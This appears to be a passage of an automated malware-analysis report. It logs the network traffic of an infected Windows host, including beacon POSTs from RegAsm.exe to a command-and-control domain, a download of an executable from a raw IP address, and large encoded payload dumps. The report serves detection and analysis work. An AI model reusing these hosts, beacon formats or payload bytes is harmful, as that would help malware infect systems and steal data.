                                                          Dec 24, 2024 02:18:21.704370975 CET1236INData Raw: 65 00 6e 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 6c 00 61 00 59 00 6e 00 70 00 34 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 70 00 44 00 55 00 57 00 68 00 61 00 56 00
                                                          Data Ascii: enRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVk
                                                          Dec 24, 2024 02:18:21.704389095 CET744INData Raw: 46 00 42 00 4f 00 56 00 68 00 46 00 62 00 55 00 46 00 4d 00 51 00 6a 00 42 00 46 00 4e 00 6c 00 6c 00 45 00 52 00 6c 00 52 00 42 00 56 00 55 00 6c 00 4d 00 52 00 46 00 5a 00 6f 00 57 00 45 00 74 00 74 00 4f 00 44 00 68 00 52 00 61 00 46 00 70 00
                                                          Data Ascii: FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2
                                                          Dec 24, 2024 02:18:21.705244064 CET1236INData Raw: 46 00 57 00 62 00 55 00 6c 00 4c 00 52 00 55 00 5a 00 4e 00 56 00 56 00 6c 00 70 00 52 00 6c 00 70 00 45 00 52 00 55 00 6c 00 49 00 52 00 32 00 74 00 4a 00 65 00 46 00 6c 00 33 00 4e 00 56 00 52 00 43 00 56 00 6d 00 4e 00 58 00 51 00 6e 00 67 00
                                                          Data Ascii: FWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJ
                                                          Dec 24, 2024 02:18:21.705256939 CET1236INData Raw: 54 00 6c 00 46 00 6e 00 5a 00 47 00 46 00 43 00 4d 00 55 00 56 00 45 00 52 00 6d 00 78 00 4f 00 5a 00 46 00 52 00 33 00 65 00 45 00 4e 00 4e 00 61 00 30 00 6c 00 52 00 55 00 57 00 77 00 30 00 56 00 57 00 46 00 42 00 57 00 6d 00 46 00 43 00 65 00
                                                          Data Ascii: TlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE
                                                          Dec 24, 2024 02:18:21.710906982 CET1236INData Raw: 46 00 45 00 52 00 6d 00 78 00 4f 00 56 00 6c 00 6c 00 6e 00 5a 00 47 00 46 00 43 00 4d 00 55 00 56 00 45 00 52 00 6d 00 78 00 4f 00 56 00 6d 00 4a 00 33 00 65 00 45 00 4e 00 52 00 62 00 55 00 31 00 4e 00 52 00 44 00 46 00 6a 00 52 00 6c 00 56 00
                                                          Data Ascii: FERmxOVllnZGFCMUVERmxOVmJ3eENRbU1NRDFjRlVBdFRGWGtFTVZNV2NndFpESElIRGxNU1p4WlRTbjhNRm1ZQmRFSkdFRmtCQjBVR0trSmZERUpDQUZjR1l5
                                                          Dec 24, 2024 02:18:22.024548054 CET156OUTGET /infopage/inbg.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:22.425848007 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:22 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:07:09 GMT
                                                          ETag: "49c00-629dc654be596"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 302080
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d [TRUNCATED]
                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gP@`@ 8.text6 `.rdata "@@.data0P@.reloc8 :b@B


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.849709172.67.195.2414432288C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:21 UTC263OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-12-24 01:18:21 UTC1124INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=jdb1asboe2mqcfh17r2qjrd1eq; expires=Fri, 18 Apr 2025 19:05:00 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=97tTkFLYE4Z%2F1mVEaRoCt2lToVKpiIJ8kS32NUkC9NOzBbXI7VMOILw44xXcmHm5tZvPm3K9vLI%2BSD6lJDRFjhk8dVjqMQ3xjzLMdNQfaLpKLQh6%2B7J%2BWFKqSmekUrYlqtSP"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1c74b6f8c8f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1803&rtt_var=692&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1564844&cwnd=209&unsent_bytes=0&cid=0005fd37ab829475&ts=1483&x=0"
                                                          2024-12-24 01:18:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-12-24 01:18:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.849710172.67.195.2414434152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:21 UTC263OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-12-24 01:18:21 UTC1122INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=13jkqaosask8m3jfbhdl2g8des; expires=Fri, 18 Apr 2025 19:05:00 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MeSoK2rWi0VXjBrdHxrt5Bp%2BogTAtyEjiabwQ2KujdNVY7LrQQ55d6nYEZFXILkoSezpqG1yUvsIDHf5ZF5krxVWrR7WWPKcOzDZHElU%2FIbIgvBHAxTuJgbCi%2BGHoyhrMuJr"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1c75e130f7f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1531&rtt_var=634&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1907250&cwnd=243&unsent_bytes=0&cid=1dd9d42dcf3c1c04&ts=1501&x=0"
                                                          2024-12-24 01:18:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-12-24 01:18:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.849712172.67.195.2414434132C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:21 UTC263OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-12-24 01:18:22 UTC1121INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:22 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=t2vkiv8jbuqu1cpt682i7kum93; expires=Fri, 18 Apr 2025 19:05:01 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VOSTq87ezMYKXZnhDuyWDdTVLREhY%2Fd8T7aq8KozFTU3AEKLYrqg7NxNQtN9HAwmaY6ZR4GmpL76SDV8i9IN02%2Fcm2727DY3G08f0c057QX7BbxckSy0B3%2BaAuFwiG9osQVw"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1ca0d11186d-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1470&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1921052&cwnd=250&unsent_bytes=0&cid=b593e559f8e9272b&ts=773&x=0"
                                                          2024-12-24 01:18:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-12-24 01:18:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.849716172.67.195.2414434132C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:23 UTC264OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 49
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:23 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 26 6a 3d
                                                          Data Ascii: act=recive_message&ver=4.0&lid=VC6Dfm--Loader2&j=
                                                          2024-12-24 01:18:24 UTC1121INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:24 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=oi2kngmnn37vde6vpd6j8ja4e4; expires=Fri, 18 Apr 2025 19:05:02 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9zRUYbY6rdmr90zUxvM1JdAY%2FhhThM3qQSKBUXIVmowmrVWI%2FriG%2B7TxdroUpfxBABVeo1ZMTbHiKm9JCUphbzB55Vdb4PoMh3D3C7OGEvnJrQgC3LQ5dkGizFx6W3WfrK22"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1d67b7343d3-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1560&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=949&delivery_rate=1772920&cwnd=236&unsent_bytes=0&cid=0ebd4dd80d1a91f6&ts=767&x=0"
                                                          2024-12-24 01:18:24 UTC248INData Raw: 33 64 66 61 0d 0a 47 43 4c 6a 73 48 49 4f 39 39 47 5a 75 44 42 2b 4a 6a 6c 45 71 68 61 53 49 72 73 4f 54 43 7a 58 6a 6a 41 75 54 30 5a 4a 72 70 35 6a 41 4a 57 53 53 44 72 62 38 2b 72 64 45 6b 52 53 53 7a 48 50 4f 72 42 44 33 79 78 32 53 72 62 69 51 30 74 6a 5a 44 2f 44 76 43 4a 45 67 74 77 42 61 39 76 7a 2f 4d 41 53 52 48 31 43 5a 73 39 34 73 42 69 5a 61 79 5a 4f 74 75 4a 53 54 79 51 70 4f 63 4c 39 63 45 36 45 32 42 64 74 6b 37 44 31 31 56 55 62 51 31 67 75 78 48 2f 2f 53 74 59 73 59 41 36 79 39 42 49 55 62 51 73 73 32 76 39 56 51 35 44 62 55 48 50 62 71 72 76 64 58 6c 77 63 47 79 58 50 64 50 35 45 33 32 55 6b 52 4c 2f 71 55 30 6f 6c 4e 69 44 49 39 6e 42 41 68 39 6b 64 5a 49 65 39 2f 39 4a 65 48 55 6c 59 5a 6f 59 30 39 31 69 5a 4e 47
                                                          Data Ascii: 3dfaGCLjsHIO99GZuDB+JjlEqhaSIrsOTCzXjjAuT0ZJrp5jAJWSSDrb8+rdEkRSSzHPOrBD3yx2SrbiQ0tjZD/DvCJEgtwBa9vz/MASRH1CZs94sBiZayZOtuJSTyQpOcL9cE6E2Bdtk7D11VUbQ1guxH//StYsYA6y9BIUbQss2v9VQ5DbUHPbqrvdXlwcGyXPdP5E32UkRL/qU0olNiDI9nBAh9kdZIe9/9JeHUlYZoY091iZNG
                                                          2024-12-24 01:18:24 UTC1369INData Raw: 34 64 68 2b 39 44 58 54 67 70 4f 38 71 38 5a 51 36 59 6b 68 64 67 31 65 75 37 30 6c 34 53 51 56 67 70 7a 33 58 77 55 74 5a 73 4c 55 61 39 36 46 68 44 49 69 73 6c 78 76 74 79 53 59 62 64 46 32 53 54 76 50 69 61 48 46 78 44 51 32 61 51 4e 4e 42 51 32 6d 38 36 51 36 53 73 54 51 49 30 5a 43 7a 41 76 43 49 41 68 39 77 52 59 5a 57 68 38 39 46 5a 47 56 5a 51 4c 38 56 35 38 45 33 54 59 79 31 4f 73 75 5a 59 51 79 63 67 4a 73 48 36 65 6b 44 42 6e 46 42 72 6a 66 4f 6a 6d 6e 45 5a 56 46 77 71 33 6a 62 4b 41 4d 59 69 4e 77 36 79 34 42 49 55 62 53 77 75 7a 2f 39 78 54 34 4c 61 47 33 36 56 6f 66 33 58 56 77 35 43 58 69 6a 43 64 2b 4a 4b 31 32 6f 74 52 37 37 6c 56 30 73 70 5a 47 57 4d 2b 32 49 41 32 5a 49 78 59 5a 36 2f 38 63 31 53 58 46 73 56 50 34 68 7a 2f 41 43 42 4c
                                                          Data Ascii: 4dh+9DXTgpO8q8ZQ6Ykhdg1eu70l4SQVgpz3XwUtZsLUa96FhDIislxvtySYbdF2STvPiaHFxDQ2aQNNBQ2m86Q6SsTQI0ZCzAvCIAh9wRYZWh89FZGVZQL8V58E3TYy1OsuZYQycgJsH6ekDBnFBrjfOjmnEZVFwq3jbKAMYiNw6y4BIUbSwuz/9xT4LaG36Vof3XVw5CXijCd+JK12otR77lV0spZGWM+2IA2ZIxYZ6/8c1SXFsVP4hz/ACBL
                                                          2024-12-24 01:18:24 UTC1369INData Raw: 73 48 41 77 71 50 47 75 55 76 46 42 44 6c 64 45 61 4c 71 43 77 39 64 52 56 43 67 52 45 61 4e 45 30 39 30 79 5a 4e 47 35 44 74 4f 52 55 58 69 49 70 4b 4d 4c 79 64 55 57 4f 32 68 42 73 6d 4c 62 2f 30 56 6b 66 53 56 38 30 77 6e 54 34 52 64 68 6d 4a 41 37 37 72 46 56 55 62 58 78 72 2f 65 74 78 41 72 54 52 48 6d 4b 53 70 62 76 46 48 41 55 45 58 43 71 49 4c 4c 42 4e 30 57 6b 72 51 62 54 6d 58 45 6b 6e 4b 43 50 43 2f 32 68 50 68 64 49 63 5a 4a 2b 2b 39 64 35 61 46 55 39 51 49 4d 68 31 2b 67 43 58 4c 43 6c 57 39 62 51 53 65 43 6f 6f 4a 73 4f 2b 54 30 4f 50 33 42 64 36 31 61 79 31 77 78 49 62 53 42 74 2b 69 48 6a 35 51 4e 4a 6d 4b 6b 36 79 34 56 64 50 4b 69 63 6d 79 2f 5a 30 52 34 58 65 47 57 47 54 73 2f 7a 65 56 77 35 42 55 69 72 45 4e 4c 34 41 33 6e 52 75 46 76
                                                          Data Ascii: sHAwqPGuUvFBDldEaLqCw9dRVCgREaNE090yZNG5DtORUXiIpKMLydUWO2hBsmLb/0VkfSV80wnT4RdhmJA77rFVUbXxr/etxArTRHmKSpbvFHAUEXCqILLBN0WkrQbTmXEknKCPC/2hPhdIcZJ++9d5aFU9QIMh1+gCXLClW9bQSeCooJsO+T0OP3Bd61ay1wxIbSBt+iHj5QNJmKk6y4VdPKicmy/Z0R4XeGWGTs/zeVw5BUirENL4A3nRuFv
                                                          2024-12-24 01:18:24 UTC1369INData Raw: 62 58 78 72 78 66 56 6f 54 6f 2f 62 48 57 71 64 74 50 58 58 57 52 70 50 58 43 48 4f 65 66 68 4e 33 47 38 76 53 72 2f 2b 55 55 63 6e 4b 53 47 4d 73 6a 70 48 6d 5a 4a 49 4c 4c 4b 2f 30 73 70 4a 44 6c 49 62 4f 59 5a 74 73 45 66 56 4c 48 59 4f 74 75 4e 62 51 79 55 73 4a 4d 50 34 64 45 61 48 33 78 56 6a 6e 36 48 7a 31 46 38 58 53 31 41 30 79 48 6e 30 54 4e 31 6b 4a 55 54 31 6f 68 4a 4c 4e 57 52 7a 6a 4d 6c 33 54 34 48 52 42 69 79 4b 2f 65 4b 61 56 52 41 45 41 32 62 45 65 76 42 50 31 57 41 6c 52 72 54 67 58 45 73 6f 4c 53 50 45 37 6e 74 45 69 64 4d 65 59 35 53 33 2f 74 39 57 47 30 42 64 4b 59 67 36 73 45 66 42 4c 48 59 4f 6d 73 74 6e 44 67 77 65 61 39 4f 79 59 77 43 47 33 6c 41 30 31 62 2f 34 31 6c 6f 54 51 6c 49 71 77 6e 33 37 54 4e 4a 6f 49 6b 65 77 36 6c 4e
                                                          Data Ascii: bXxrxfVoTo/bHWqdtPXXWRpPXCHOefhN3G8vSr/+UUcnKSGMsjpHmZJILLK/0spJDlIbOYZtsEfVLHYOtuNbQyUsJMP4dEaH3xVjn6Hz1F8XS1A0yHn0TN1kJUT1ohJLNWRzjMl3T4HRBiyK/eKaVRAEA2bEevBP1WAlRrTgXEsoLSPE7ntEidMeY5S3/t9WG0BdKYg6sEfBLHYOmstnDgwea9OyYwCG3lA01b/41loTQlIqwn37TNJoIkew6lN
                                                          2024-12-24 01:18:24 UTC1369INData Raw: 63 76 31 61 45 36 4d 33 52 68 6b 6e 4c 4c 2f 33 31 38 61 53 46 45 6e 7a 33 72 2b 53 4a 6b 69 62 6b 6d 74 72 41 6f 4d 44 44 51 77 33 75 70 33 59 59 7a 64 55 48 50 62 71 72 76 64 58 6c 77 63 47 79 2f 61 63 50 31 53 30 47 73 67 51 62 62 2b 55 30 45 6d 4e 69 7a 44 2b 48 31 4d 68 39 30 57 62 5a 43 35 39 39 31 58 46 30 74 58 5a 6f 59 30 39 31 69 5a 4e 47 35 67 76 76 39 46 54 79 4d 76 50 64 65 38 5a 51 36 59 6b 68 64 67 31 65 75 37 32 56 6b 58 51 46 73 71 79 48 44 39 51 4d 74 6a 4b 55 6d 38 35 30 42 47 4b 69 4d 67 78 50 64 31 52 70 50 65 48 6e 36 51 6f 65 6d 61 48 46 78 44 51 32 61 51 4e 4d 5a 48 79 58 77 74 44 49 54 36 55 56 6f 6d 4b 53 65 4d 34 7a 52 5a 77 64 55 63 4c 4d 33 7a 2f 64 56 62 48 30 74 61 4c 38 52 35 39 55 6e 63 62 53 68 4b 76 2b 5a 53 53 69 73 6c
                                                          Data Ascii: cv1aE6M3RhknLL/318aSFEnz3r+SJkibkmtrAoMDDQw3up3YYzdUHPbqrvdXlwcGy/acP1S0GsgQbb+U0EmNizD+H1Mh90WbZC5991XF0tXZoY091iZNG5gvv9FTyMvPde8ZQ6Ykhdg1eu72VkXQFsqyHD9QMtjKUm850BGKiMgxPd1RpPeHn6QoemaHFxDQ2aQNMZHyXwtDIT6UVomKSeM4zRZwdUcLM3z/dVbH0taL8R59UncbShKv+ZSSisl
                                                          2024-12-24 01:18:24 UTC1369INData Raw: 70 48 6a 5a 4a 49 4c 4a 61 30 2b 4e 74 59 46 55 68 55 49 63 78 6d 2b 6b 66 4c 62 53 39 46 75 4f 42 53 51 53 41 75 4b 73 58 78 64 6b 32 47 31 52 39 70 31 66 32 37 33 55 70 63 48 42 73 48 78 58 2f 38 47 34 4d 73 4d 51 43 73 72 46 56 41 62 58 78 72 7a 50 5a 2f 53 6f 7a 52 48 32 2b 48 73 76 33 49 55 68 46 4f 53 53 7a 44 63 66 31 4e 31 47 38 6f 53 4c 37 67 51 45 55 74 4a 79 43 4d 73 6a 70 48 6d 5a 4a 49 4c 4c 61 6b 37 64 42 56 45 46 4a 51 4a 38 74 69 2f 56 43 5a 49 6d 35 66 73 76 30 53 46 44 73 30 50 4d 76 6a 4e 46 6e 42 31 52 77 73 7a 66 50 39 30 31 51 62 51 6c 55 30 7a 58 4c 2f 54 39 42 6c 4b 6b 61 32 37 46 5a 49 4b 69 45 6f 77 50 64 39 51 34 37 57 47 57 4b 63 76 4c 75 55 45 68 74 63 47 33 36 49 56 65 74 44 31 57 46 75 55 66 76 31 45 6b 73 68 5a 48 4f 4d 38
                                                          Data Ascii: pHjZJILJa0+NtYFUhUIcxm+kfLbS9FuOBSQSAuKsXxdk2G1R9p1f273UpcHBsHxX/8G4MsMQCsrFVAbXxrzPZ/SozRH2+Hsv3IUhFOSSzDcf1N1G8oSL7gQEUtJyCMsjpHmZJILLak7dBVEFJQJ8ti/VCZIm5fsv0SFDs0PMvjNFnB1RwszfP901QbQlU0zXL/T9BlKka27FZIKiEowPd9Q47WGWKcvLuUEhtcG36IVetD1WFuUfv1EkshZHOM8
                                                          2024-12-24 01:18:24 UTC1369INData Raw: 5a 42 6d 6d 53 70 62 6e 76 55 52 4a 4b 58 44 43 49 61 38 38 4f 6d 57 4d 30 44 75 33 56 53 77 77 71 4b 47 75 55 76 47 39 48 67 64 55 4b 65 70 4b 2f 36 74 46 66 45 47 5a 55 49 64 35 33 2f 30 50 49 5a 57 4a 46 75 4b 77 63 44 43 6f 38 61 35 53 38 56 55 65 58 30 54 39 76 68 4c 71 37 6c 42 49 62 55 68 74 2b 69 45 71 77 55 74 70 38 4c 55 47 6b 30 68 49 55 4e 42 70 72 78 2b 70 39 55 49 4c 45 47 32 47 5a 6f 73 57 61 43 6b 67 57 43 58 53 61 4a 75 38 41 78 6c 4e 67 44 72 53 73 43 6e 55 30 5a 44 32 4d 70 43 67 4f 77 63 42 51 4e 4e 58 30 2b 4d 68 41 47 6b 64 4e 4a 59 39 4b 7a 6d 66 50 5a 69 6c 65 73 76 74 64 44 47 4e 6b 4a 49 79 6b 51 77 43 49 31 51 74 39 67 37 37 72 33 52 49 6a 43 68 73 2b 69 43 79 77 64 64 70 69 49 45 6d 6a 2f 52 39 72 4f 79 34 73 33 50 74 74 54 38
                                                          Data Ascii: ZBmmSpbnvURJKXDCIa88OmWM0Du3VSwwqKGuUvG9HgdUKepK/6tFfEGZUId53/0PIZWJFuKwcDCo8a5S8VUeX0T9vhLq7lBIbUht+iEqwUtp8LUGk0hIUNBprx+p9UILEG2GZosWaCkgWCXSaJu8AxlNgDrSsCnU0ZD2MpCgOwcBQNNX0+MhAGkdNJY9KzmfPZilesvtdDGNkJIykQwCI1Qt9g77r3RIjChs+iCywddpiIEmj/R9rOy4s3PttT8
                                                          2024-12-24 01:18:24 UTC1369INData Raw: 6e 72 50 38 79 6b 51 48 43 46 4d 6c 30 6d 37 4f 66 76 4a 67 4b 45 6d 76 36 31 52 71 44 57 52 6c 6a 50 4d 36 47 4c 69 53 57 43 79 71 2f 62 76 43 45 6b 51 45 62 69 58 47 65 76 64 57 79 43 45 47 62 59 2f 57 45 47 41 71 4d 57 6e 34 2b 32 70 52 69 74 38 63 4c 4e 76 7a 2f 5a 6f 4b 54 41 6f 62 49 74 6b 30 71 42 43 4c 4e 33 73 64 34 72 77 41 55 32 4d 39 61 39 71 38 49 68 4c 50 6b 67 49 73 7a 66 4f 38 32 55 41 4f 51 6c 67 77 79 7a 50 4f 66 76 35 69 4b 55 2b 6a 2f 45 56 44 45 78 6f 2b 7a 2f 4a 30 52 35 66 44 55 43 4c 56 76 4c 75 43 61 31 77 4d 47 78 6d 47 4e 4f 67 41 67 53 77 62 54 62 76 69 56 56 6f 38 61 51 7a 43 2b 33 74 57 6b 63 55 66 4c 4e 76 7a 2f 5a 6f 4b 54 67 6f 62 49 74 6b 30 71 42 43 4c 4e 33 73 64 34 72 77 41 55 32 4d 39 61 39 71 38 49 68 4c 50 6b 67 49
                                                          Data Ascii: nrP8ykQHCFMl0m7OfvJgKEmv61RqDWRljPM6GLiSWCyq/bvCEkQEbiXGevdWyCEGbY/WEGAqMWn4+2pRit8cLNvz/ZoKTAobItk0qBCLN3sd4rwAU2M9a9q8IhLPkgIszfO82UAOQlgwyzPOfv5iKU+j/EVDExo+z/J0R5fDUCLVvLuCa1wMGxmGNOgAgSwbTbviVVo8aQzC+3tWkcUfLNvz/ZoKTgobItk0qBCLN3sd4rwAU2M9a9q8IhLPkgI
